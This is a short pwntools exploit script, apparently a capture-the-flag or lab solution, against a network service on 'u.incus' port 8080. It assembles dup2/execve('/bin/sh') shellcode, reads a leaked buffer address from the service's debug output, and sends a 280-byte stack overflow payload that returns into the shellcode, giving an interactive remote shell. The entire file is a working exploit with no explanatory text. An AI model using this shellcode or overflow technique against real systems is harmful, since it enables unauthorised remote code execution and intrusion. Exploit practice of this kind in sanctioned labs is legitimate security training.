from pwn import *
context(arch='amd64', os='linux')

sc = '''
   /* dup() file descriptor rbp into stdin/stdout/stderr */
    push 2
    pop rsi
    push 5
    pop rdi
    /* dup2(fd='rdi', fd2='rsi') */
    /* setregs noop */
    /* call dup2() */
    push SYS_dup2 /* 0x21 */
    pop rax
    syscall
    dec rsi
    push SYS_dup2 /* 0x21 */
    pop rax
    syscall
    dec rsi
    push SYS_dup2 /* 0x21 */
    pop rax
    syscall

    /* execve(path='/bin///sh', argv=['sh'], envp=0) */
    /* push b'/bin///sh\x00' */
    push 0x68
    mov rax, 0x732f2f2f6e69622f
    push rax
    mov rdi, rsp
    /* push argument array ['sh\x00'] */
    /* push b'sh\x00' */
    push 0x1010101 ^ 0x6873
    xor dword ptr [rsp], 0x1010101
    xor esi, esi /* 0 */
    push rsi /* null terminate */
    push 8
    pop rsi
    add rsi, rsp
    push rsi /* 'sh\x00' */
    mov rsi, rsp
    xor edx, edx /* 0 */
    /* call execve() */
    push SYS_execve /* 0x3b */
    pop rax
    syscall
    '''

sc = asm(sc)

# io = remote("9000:9aab:1f66:e9a7:216:3eff:fec9:efb6", 8080)
io = remote("u.incus", 8080)
# io = remote("::1", 8080)

io.sendline(b"abc")
io.recvuntil(b"DEBUG: buf is at ")
buf_addr = int(io.recvline().decode().strip(), 16)

io.sendline(sc + b'A' * (280 - len(sc)) + p64(buf_addr))
io.interactive()